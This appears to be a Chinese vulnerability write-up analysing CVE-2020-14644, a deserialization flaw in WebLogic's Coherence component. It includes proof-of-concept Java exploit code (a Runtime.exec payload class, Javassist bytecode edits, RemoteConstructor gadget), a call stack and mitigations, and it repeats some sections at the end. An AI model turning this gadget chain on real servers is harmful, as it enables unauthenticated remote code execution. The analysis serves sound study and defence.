WebLogic Coherence组件IIOP反序列化漏洞分析(CVE-2020-14644)<\/h1>

漏洞概述<\/h2>
CVE-2020-14644是Oracle WebLogic Server中Coherence组件的一个严重反序列化漏洞，允许攻击者通过IIOP协议发送恶意序列化数据，在无需认证的情况下实现远程代码执行(RCE)。<\/p>

受影响版本<\/h2>

WebLogic 12.2.1.3.0<\/li>
WebLogic 12.2.1.4.0<\/li>

WebLogic 14.1.1.0.0<\/li> <\/ul>

漏洞原理<\/h2>
该漏洞源于WebLogic的Coherence组件在处理IIOP协议的反序列化数据时，未对输入进行充分验证，导致攻击者可以构造恶意的序列化对象触发反序列化操作，最终执行任意命令。<\/p>

漏洞复现环境<\/h2>

Java版本: 1.8.0_112<\/li>
WebLogic版本: 12.2.1.4.0 (测试发现12.2.1.3.0版本Coherence组件不完整)<\/li>

开发工具: IDEA (用于调试分析)<\/li> <\/ul>

关键组件<\/h2>

所需JAR文件<\/h3>

coherence.jar<\/strong>: 位于WebLogic安装目录下<\/p>

\/Oracle\/Middleware\/Oracle_Home\/wlserver\/server\/lib\/console-ext\/autodeploy\/coherence.jar
<\/code><\/pre>
<\/li>

wlfullclient.jar<\/strong>: 需要手动生成<\/p>
java -jar ~\/Oracle\/Middleware\/Oracle_Home\/wlserver\/modules\/com.bea.core.jarbuilder.jar
<\/code><\/pre>
生成后位于:<\/p>
~\/Oracle\/Middleware\/Oracle_Home\/wlserver\/server\/lib\/wlfullclient.jar
<\/code><\/pre>
<\/li>
<\/ol>
漏洞利用分析<\/h2>
恶意类构造<\/h3>
攻击者需要构造一个实现特定接口的恶意类:<\/p>
package<\/span> org.unicodesec;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.tangosol.internal.util.invoke.RemoteConstructor;<\/span>
<\/span><\/span>import<\/span> weblogic.cluster.singleton.ClusterMasterRemote;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> test1<\/span> implements<\/span> com.<\/span>tangosol<\/span>.<\/span>internal<\/span>.<\/span>util<\/span>.<\/span>invoke<\/span>.<\/span>Remotable<\/span>,<\/span> ClusterMasterRemote {<\/span>
<\/span><\/span>    public<\/span> test1<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        String cmd =<\/span> "touch \/tmp\/rai4over"<\/span>;<\/span> \/\/ 恶意命令
<\/span><\/span><\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    \/\/ 接口方法实现...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用Javassist修改字节码<\/h3>
攻击使用Javassist库动态修改类字节码:<\/p>
ClassIdentity classIdentity =<\/span> new<\/span> ClassIdentity(<\/span>org.<\/span>unicodesec<\/span>.<\/span>test1<\/span>.<\/span>class<\/span>);<\/span>
<\/span><\/span>ClassPool cp =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>CtClass ctClass =<\/span> cp.<\/span>get<\/span>(<\/span>org.<\/span>unicodesec<\/span>.<\/span>test1<\/span>.<\/span>class<\/span>.<\/span>getName<\/span>());<\/span>
<\/span><\/span>ctClass.<\/span>replaceClassName<\/span>(<\/span>org.<\/span>unicodesec<\/span>.<\/span>test1<\/span>.<\/span>class<\/span>.<\/span>getName<\/span>(),<\/span> 
<\/span><\/span>    org.<\/span>unicodesec<\/span>.<\/span>test1<\/span>.<\/span>class<\/span>.<\/span>getName<\/span>()<\/span> +<\/span> "$"<\/span> +<\/span> classIdentity.<\/span>getVersion<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>构造RemoteConstructor对象<\/h3>
RemoteConstructor constructor =<\/span> new<\/span> RemoteConstructor(<\/span>
<\/span><\/span>    new<\/span> ClassDefinition(<\/span>classIdentity,<\/span> ctClass.<\/span>toBytecode<\/span>()),<\/span>
<\/span><\/span>    new<\/span> Object[]{}<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span><\/code><\/pre>序列化与反序列化触发<\/h3>
byte<\/span>[]<\/span> obj =<\/span> Serializables.<\/span>serialize<\/span>(<\/span>constructor);<\/span>
<\/span><\/span>Serializables.<\/span>deserialize<\/span>(<\/span>obj);<\/span> \/\/ 触发漏洞
<\/span><\/span><\/span><\/code><\/pre>漏洞调用链分析<\/h2>

入口点<\/strong>: RemoteConstructor#readResolve<\/code> (而非常见的readObject)<\/li>
关键调用路径<\/strong>:

RemoteConstructor#newInstance<\/code><\/li>
RemotableSupport#realize<\/code><\/li>
RemotableSupport#defineClass<\/code> (加载恶意字节码)<\/li>
ClassDefinition#createInstance<\/code><\/li>
最终反射执行构造函数中的恶意代码<\/li>
<\/ul>
<\/li>
<\/ol>
完整调用栈<\/h2>
exec:347, Runtime (java.lang)
<init>:15, test1$81646C2598E743F9FE254AB93A0FBE14 (org.unicodesec)
newInvokeSpecial__L:-1, 36333492 (java.lang.invoke.LambdaForm$DMH)
reinvoke:-1, 55909012 (java.lang.invoke.LambdaForm$BMH)
invoker:-1, 2083117811 (java.lang.invoke.LambdaForm$MH)
invokeExact_MT:-1, 157683534 (java.lang.invoke.LambdaForm$MH)
invokeWithArguments:627, MethodHandle (java.lang.invoke)
createInstance:149, ClassDefinition (com.tangosol.internal.util.invoke)
realize:142, RemotableSupport (com.tangosol.internal.util.invoke)
newInstance:122, RemoteConstructor (com.tangosol.internal.util.invoke)
readResolve:233, RemoteConstructor (com.tangosol.internal.util.invoke)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadResolve:1148, ObjectStreamClass (java.io)
readOrdinaryObject:1817, ObjectInputStream (java.io)
readObject0:1353, ObjectInputStream (java.io)
readObject:373, ObjectInputStream (java.io)
deserialize:27, Serializables (org.unicodesec)
deserialize:22, Serializables (org.unicodesec)
main:22, RCETEST (org.unicodesec)
<\/code><\/pre>
防御措施<\/h2>

及时安装Oracle官方发布的安全补丁<\/li>
限制IIOP协议的访问权限<\/li>
使用Java反序列化过滤器<\/li>
升级到不受影响的WebLogic版本<\/li>
<\/ol>
参考资源<\/h2>

Oracle安全公告: https:\/\/www.oracle.com\/security-alerts\/cpujul2020.html<\/li>
漏洞分析文章: https:\/\/www.cnblogs.com\/ph4nt0mer\/p\/13469690.html<\/li>
Seebug漏洞详情: https:\/\/paper.seebug.org\/1281\/<\/li>
<\/ol>

WebLogic Coherence组件IIOP反序列化漏洞分析(CVE-2020-14644)<\/h1>

漏洞概述<\/h2> CVE-2020-14644是Oracle WebLogic Server中Coherence组件的一个严重反序列化漏洞，允许攻击者通过IIOP协议发送恶意序列化数据，在无需认证的情况下实现远程代码执行(RCE)。<\/p>

漏洞原理<\/h2> 该漏洞源于WebLogic的Coherence组件在处理IIOP协议的反序列化数据时，未对输入进行充分验证，导致攻击者可以构造恶意的序列化对象触发反序列化操作，最终执行任意命令。<\/p>

关键组件<\/h2>

漏洞利用分析<\/h2>

参考资源<\/h2> Oracle安全公告: https:\/\/www.oracle.com\/security-alerts\/cpujul2020.html<\/li> 漏洞分析文章: https:\/\/www.cnblogs.com\/ph4nt0mer\/p\/13469690.html<\/li> Seebug漏洞详情: https:\/\/paper.seebug.org\/1281\/<\/li> <\/ol>

漏洞概述<\/h2>
CVE-2020-14644是Oracle WebLogic Server中Coherence组件的一个严重反序列化漏洞，允许攻击者通过IIOP协议发送恶意序列化数据，在无需认证的情况下实现远程代码执行(RCE)。<\/p>

漏洞原理<\/h2>
该漏洞源于WebLogic的Coherence组件在处理IIOP协议的反序列化数据时，未对输入进行充分验证，导致攻击者可以构造恶意的序列化对象触发反序列化操作，最终执行任意命令。<\/p>

参考资源<\/h2>

Oracle安全公告: https:\/\/www.oracle.com\/security-alerts\/cpujul2020.html<\/li>
漏洞分析文章: https:\/\/www.cnblogs.com\/ph4nt0mer\/p\/13469690.html<\/li>
Seebug漏洞详情: https:\/\/paper.seebug.org\/1281\/<\/li> <\/ol>